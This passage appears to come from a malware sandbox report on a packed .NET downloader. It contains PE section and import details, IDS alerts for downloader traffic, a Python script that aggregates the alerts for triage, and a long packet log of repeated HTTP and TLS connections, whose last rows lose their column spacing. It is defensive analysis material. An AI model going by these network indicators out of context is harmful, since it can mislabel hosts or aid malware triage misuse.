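        print(f"{s['name']:<8} va=0x{s['virtual_address']:x} raw=0x{s['raw_size']:x} entropy={s['entropy']:.3f}")
    print("suspicious:", suspicious_sections(secs))
```

Run against a real file, `parse_sections(open(path, "rb").read())` gives the same columns as the table; the entropy figure alone is not proof of malice (signed installers and self-extracting archives also score high), but an executable section at 7.8 combined with a single mscoree.dll!_CorExeMain import is the profile of a packed .NET loader and justifies letting it run under instrumentation rather than trusting static scan results.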
Name           RVA      Size   Type                                                         Language  Country  ZLIB Complexity
RT_ICON        0xb40e8  0xf91  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                     0.8936010037641154
RT_GROUP_ICON  0xb507c  0x14   data                                                                            1.05
RT_VERSION     0xb5090  0x30c  data                                                                            0.43205128205128207
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                          Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-10-11T09:35:17.205286+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4  49733        132.226.247.73  80         TCP
2024-10-11T09:35:19.911334+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4  49733        132.226.247.73  80         TCP
2024-10-11T09:35:20.420242+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.4  49738        188.114.96.3    443        TCP
2024-10-11T09:35:20.642777+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4  49737        132.226.247.73  80         TCP
2024-10-11T09:35:21.299031+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4  49739        132.226.247.73  80         TCP
2024-10-11T09:35:21.549600+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4  49737        132.226.247.73  80         TCP
2024-10-11T09:35:21.683879+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.4  49741        188.114.96.3    443        TCP
2024-10-11T09:35:22.078082+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.4  49742        188.114.96.3    443        TCP
2024-10-11T09:35:22.814729+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4  49744        132.226.247.73  80         TCP
2024-10-11T09:35:23.033039+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.4  49745        188.114.96.3    443        TCP
2024-10-11T09:35:23.360136+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.4  49746        188.114.96.3    443        TCP
2024-10-11T09:35:24.346686+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.4  49749        188.114.96.3    443        TCP
2024-10-11T09:35:29.560790+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.4  49765        188.114.96.3    443        TCP
2024-10-11T09:35:30.000137+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.4  49766        188.114.96.3    443        TCP
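Read as a list, the alerts above are fourteen separate events; read as a summary they are two facts: the sample opens a fresh HTTP connection to 132.226.247.73:80 every second or two (SID 2803274) and does the same over TLS to 188.114.96.3:443 (SID 2803305), each hit coming from a new client port. The aggregation below is an added example, not part of the report and not Joe Sandbox code: it parses alert rows carrying the same fields as the table (timestamp, SID, signature, severity, source and destination address and port, protocol), groups them by signature and destination, counts distinct client ports as separate connections and reports the observed window, which is the form the finding takes in a ticket or a blocklist. The input rows are a constructed subset copied from the table so the block runs offline; the separator layout is the example's own assumption.

```python
import re
from datetime import datetime

# Constructed subset of the alert table above, one alert per line, columns separated by
# two or more spaces (the example's own layout; the signature text keeps single spaces).
SAMPLE_ALERTS = """\
2024-10-11T09:35:17.205286+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2  192.168.2.4  49733  132.226.247.73  80   TCP
2024-10-11T09:35:19.911334+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2  192.168.2.4  49733  132.226.247.73  80   TCP
2024-10-11T09:35:20.420242+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3  192.168.2.4  49738  188.114.96.3    443  TCP
2024-10-11T09:35:20.642777+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2  192.168.2.4  49737  132.226.247.73  80   TCP
2024-10-11T09:35:21.299031+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2  192.168.2.4  49739  132.226.247.73  80   TCP
2024-10-11T09:35:21.683879+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3  192.168.2.4  49741  188.114.96.3    443  TCP
2024-10-11T09:35:22.078082+0200  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3  192.168.2.4  49742  188.114.96.3    443  TCP
2024-10-11T09:35:22.814729+0200  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2  192.168.2.4  49744  132.226.247.73  80   TCP
"""

_IP = r"\d{1,3}(?:\.\d{1,3}){3}"
# Signature is matched non-greedily up to the single-digit severity that precedes the source IP.
ALERT_RE = re.compile(
    rf"^(?P<ts>\S+)\s+(?P<sid>\d+)\s+(?P<sig>.+?)\s+(?P<sev>\d)\s+"
    rf"(?P<src_ip>{_IP})\s+(?P<src_port>\d+)\s+(?P<dst_ip>{_IP})\s+(?P<dst_port>\d+)\s+(?P<proto>\S+)$"
)


def parse_alerts(text: str) -> list[dict]:
    """Parse alert rows into dicts; the timestamp keeps its +0200 offset via %z."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ALERT_RE.match(line)
        if not m:
            raise ValueError(f"unparseable alert row: {line!r}")
        d = m.groupdict()
        alerts.append({
            "ts": datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(d["sid"]),
            "signature": d["sig"],
            "severity": int(d["sev"]),
            "src_ip": d["src_ip"],
            "src_port": int(d["src_port"]),
            "dst_ip": d["dst_ip"],
            "dst_port": int(d["dst_port"]),
            "proto": d["proto"],
        })
    return alerts


def summarize_alerts(alerts: list[dict]) -> dict:
    """Group by (SID, destination IP, destination port); each distinct client port is one TCP connection."""
    groups: dict = {}
    for a in alerts:
        key = (a["sid"], a["dst_ip"], a["dst_port"])
        g = groups.setdefault(key, {"signature": a["signature"], "proto": a["proto"], "hits": 0,
                                    "client_ports": set(), "first": a["ts"], "last": a["ts"]})
        g["hits"] += 1
        g["client_ports"].add(a["src_port"])
        g["first"] = min(g["first"], a["ts"])
        g["last"] = max(g["last"], a["ts"])
    return groups


def window_seconds(group: dict) -> float:
    """Seconds between the first and last alert of a group."""
    return (group["last"] - group["first"]).total_seconds()


def triage_lines(groups: dict) -> list[str]:
    """One line per destination, busiest first: the form that goes into a ticket or blocklist."""
    lines = []
    for (sid, ip, port), g in sorted(groups.items(), key=lambda kv: -kv[1]["hits"]):
        lines.append(f"{ip}:{port}/{g['proto'].lower()}  sid {sid}  {g['hits']} alerts over "
                     f"{len(g['client_ports'])} connections in {window_seconds(g):.1f}s  {g['signature']}")
    return lines


if __name__ == "__main__":
    for line in triage_lines(summarize_alerts(parse_alerts(SAMPLE_ALERTS))):
        print(line)
```

Counting client ports rather than alerts matters here: SID 2803274 fires twice on port 49733 because the same connection carried two requests, so the alert count overstates connections for the HTTP host. In a SIEM the same grouping should also pull the packet rows for each client port, since the alert marks the request but the TLS session that follows it is where any payload would travel.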
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 11, 2024 09:35:16.030736923 CEST  49733        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:16.036092997 CEST  80           49733      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:16.036227942 CEST  49733        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:16.036529064 CEST  49733        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:16.041456938 CEST  80           49733      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:16.912301064 CEST  80           49733      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:16.955323935 CEST  49733        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:16.960380077 CEST  80           49733      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:17.159961939 CEST  80           49733      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:17.205286026 CEST  49733        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:17.370440006 CEST  49734        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:17.370472908 CEST  443          49734      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:17.370815992 CEST  49734        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:17.380942106 CEST  49734        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:17.380965948 CEST  443          49734      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:18.875452042 CEST  443          49734      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:18.875513077 CEST  49734        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:18.882421970 CEST  49734        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:18.882435083 CEST  443          49734      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:18.882867098 CEST  443          49734      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:19.036084890 CEST  49734        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:19.083412886 CEST  443          49734      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:19.572607040 CEST  443          49734      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:19.572681904 CEST  443          49734      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:19.572742939 CEST  49734        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:19.578602076 CEST  49734        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:19.588538885 CEST  49733        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:19.593466043 CEST  80           49733      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:19.650707960 CEST  49737        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:19.655613899 CEST  80           49737      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:19.655695915 CEST  49737        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:19.655952930 CEST  49737        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:19.660849094 CEST  80           49737      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:19.794353008 CEST  80           49733      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:19.816308975 CEST  49738        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:19.816345930 CEST  443          49738      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:19.816643000 CEST  49738        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:19.816792965 CEST  49738        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:19.816798925 CEST  443          49738      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:19.911334038 CEST  49733        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:20.281035900 CEST  443          49738      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:20.283422947 CEST  49738        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:20.283441067 CEST  443          49738      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:20.348445892 CEST  80           49737      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:20.352443933 CEST  49737        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:20.357366085 CEST  80           49737      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:20.420217991 CEST  443          49738      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:20.420319080 CEST  443          49738      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:20.420356989 CEST  49738        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:20.420701027 CEST  49738        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:20.424331903 CEST  49733        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:20.425323009 CEST  49739        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:20.430015087 CEST  80           49733      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:20.430200100 CEST  49733        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:20.430216074 CEST  80           49739      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:20.430288076 CEST  49739        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:20.430373907 CEST  49739        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:20.435199976 CEST  80           49739      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:20.562414885 CEST  80           49737      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:20.598314047 CEST  49740        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:20.598356962 CEST  443          49740      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:20.598443985 CEST  49740        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:20.602744102 CEST  49740        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:20.602766991 CEST  443          49740      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:20.642776966 CEST  49737        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:21.086656094 CEST  443          49740      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.086716890 CEST  49740        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.088272095 CEST  49740        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.088282108 CEST  443          49740      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.088551998 CEST  443          49740      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.096147060 CEST  80           49739      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:21.097199917 CEST  49741        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.097259045 CEST  443          49741      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.097357035 CEST  49741        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.097558022 CEST  49741        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.097596884 CEST  443          49741      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.142777920 CEST  49740        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.144834042 CEST  49740        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.191411972 CEST  443          49740      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.254946947 CEST  443          49740      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.255044937 CEST  443          49740      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.255101919 CEST  49740        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.257671118 CEST  49740        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.261548042 CEST  49737        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:21.266416073 CEST  80           49737      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:21.299031019 CEST  49739        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:21.471304893 CEST  80           49737      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:21.473758936 CEST  49742        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.473856926 CEST  443          49742      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.473941088 CEST  49742        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.474283934 CEST  49742        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.474317074 CEST  443          49742      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.549599886 CEST  49737        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:21.552305937 CEST  443          49741      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.554565907 CEST  49741        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.554651022 CEST  443          49741      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.683902025 CEST  443          49741      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.683998108 CEST  443          49741      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.684124947 CEST  49741        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.684804916 CEST  49741        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.689568996 CEST  49743        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:21.694381952 CEST  80           49743      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:21.694444895 CEST  49743        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:21.694551945 CEST  49743        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:21.702270985 CEST  80           49743      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:21.927648067 CEST  443          49742      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:21.933703899 CEST  49742        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:21.933752060 CEST  443          49742      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:22.078078032 CEST  443          49742      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:22.078171015 CEST  443          49742      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:22.078355074 CEST  49742        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:22.078850031 CEST  49742        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:22.082319021 CEST  49737        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:22.083761930 CEST  49744        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:22.087469101 CEST  80           49737      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:22.087599039 CEST  49737        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:22.088704109 CEST  80           49744      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:22.088927031 CEST  49744        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:22.090209007 CEST  49744        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:22.095082998 CEST  80           49744      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:22.381772041 CEST  80           49743      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:22.412050962 CEST  49745        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:22.412098885 CEST  443          49745      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:22.412822962 CEST  49745        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:22.412822962 CEST  49745        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:22.412862062 CEST  443          49745      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:22.426321983 CEST  49743        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:22.754828930 CEST  80           49744      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:22.756162882 CEST  49746        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:22.756198883 CEST  443          49746      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:22.756521940 CEST  49746        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:22.756673098 CEST  49746        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:22.756697893 CEST  443          49746      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:22.814728975 CEST  49744        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:22.884521961 CEST  443          49745      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:22.886239052 CEST  49745        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:22.886270046 CEST  443          49745      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:23.033047915 CEST  443          49745      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:23.033140898 CEST  443          49745      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:23.033265114 CEST  49745        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:23.036853075 CEST  49745        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:23.037174940 CEST  49743        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:23.040824890 CEST  49747        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:23.043071985 CEST  80           49743      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:23.043292999 CEST  49743        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:23.046289921 CEST  80           49747      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:23.046443939 CEST  49747        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:23.046443939 CEST  49747        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:23.052510977 CEST  80           49747      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:23.212853909 CEST  443          49746      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:23.214675903 CEST  49746        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:23.214705944 CEST  443          49746      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:23.360141039 CEST  443          49746      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:23.360249043 CEST  443          49746      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:23.360296011 CEST  49746        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:23.360953093 CEST  49746        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:23.381462097 CEST  49748        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:23.386415958 CEST  80           49748      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:23.386514902 CEST  49748        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:23.389908075 CEST  49748        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:23.394752979 CEST  80           49748      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:23.718689919 CEST  80           49747      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:23.720504999 CEST  49749        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:23.720558882 CEST  443          49749      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:23.720608950 CEST  49749        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:23.721210957 CEST  49749        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:23.721225023 CEST  443          49749      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:23.767772913 CEST  49747        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.079411983 CEST  80           49748      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:24.080746889 CEST  49750        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:24.080794096 CEST  443          49750      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:24.080869913 CEST  49750        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:24.081106901 CEST  49750        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:24.081119061 CEST  443          49750      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:24.127260923 CEST  49748        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.203327894 CEST  443          49749      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:24.204787016 CEST  49749        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:24.204811096 CEST  443          49749      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:24.346709967 CEST  443          49749      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:24.346870899 CEST  443          49749      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:24.347340107 CEST  49749        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:24.348397017 CEST  49749        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:24.350747108 CEST  49747        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.351790905 CEST  49751        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.356614113 CEST  80           49751      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:24.356749058 CEST  49751        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.356801033 CEST  49751        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.357091904 CEST  80           49747      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:24.359410048 CEST  49747        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.361629963 CEST  80           49751      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:24.535005093 CEST  443          49750      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:24.537098885 CEST  49750        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:24.537120104 CEST  443          49750      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:24.687891960 CEST  443          49750      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:24.687990904 CEST  443          49750      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:24.688311100 CEST  49750        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:24.688448906 CEST  49750        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:24.693164110 CEST  49748        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.693167925 CEST  49752        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.698245049 CEST  80           49752      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:24.698442936 CEST  49752        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.698442936 CEST  49752        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.698586941 CEST  80           49748      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:24.698637962 CEST  49748        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:24.703299046 CEST  80           49752      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:25.028584957 CEST  80           49751      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:25.033411026 CEST  49753        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:25.033452988 CEST  443          49753      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:25.037139893 CEST  49753        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:25.037281036 CEST  49753        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:25.037307978 CEST  443          49753      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:25.080298901 CEST  49751        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:25.362610102 CEST  80           49752      132.226.247.73   192.168.2.4
Oct 11, 2024 09:35:25.364289045 CEST  49754        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:25.364320993 CEST  443          49754      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:25.364399910 CEST  49754        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:25.364789009 CEST  49754        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:25.364804983 CEST  443          49754      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:25.408418894 CEST  49752        80         192.168.2.4      132.226.247.73
Oct 11, 2024 09:35:25.489101887 CEST  443          49753      188.114.96.3     192.168.2.4
Oct 11, 2024 09:35:25.491251945 CEST  49753        443        192.168.2.4      188.114.96.3
Oct 11, 2024 09:35:25.491282940 CEST  443          49753      188.114.96.3     192.168.2.4
                                                    Oct 11, 2024 09:35:25.633766890 CEST44349753188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:25.633858919 CEST44349753188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:25.633904934 CEST49753443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:25.634346008 CEST49753443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:25.638405085 CEST4975180192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:25.639496088 CEST4975580192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:25.643615007 CEST8049751132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:25.643681049 CEST4975180192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:25.644361019 CEST8049755132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:25.644542933 CEST4975580192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:25.644639969 CEST4975580192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:25.649616957 CEST8049755132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:25.816226006 CEST44349754188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:25.818516016 CEST49754443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:25.818543911 CEST44349754188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:25.972676039 CEST44349754188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:25.972769976 CEST44349754188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:25.972816944 CEST49754443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:25.973191977 CEST49754443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:25.976953030 CEST4975280192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:25.978111982 CEST4975680192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:25.982265949 CEST8049752132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:25.982342005 CEST4975280192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:25.982955933 CEST8049756132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:25.983041048 CEST4975680192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:25.983186007 CEST4975680192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:25.987936020 CEST8049756132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:26.318897963 CEST8049755132.226.247.73192.168.2.4
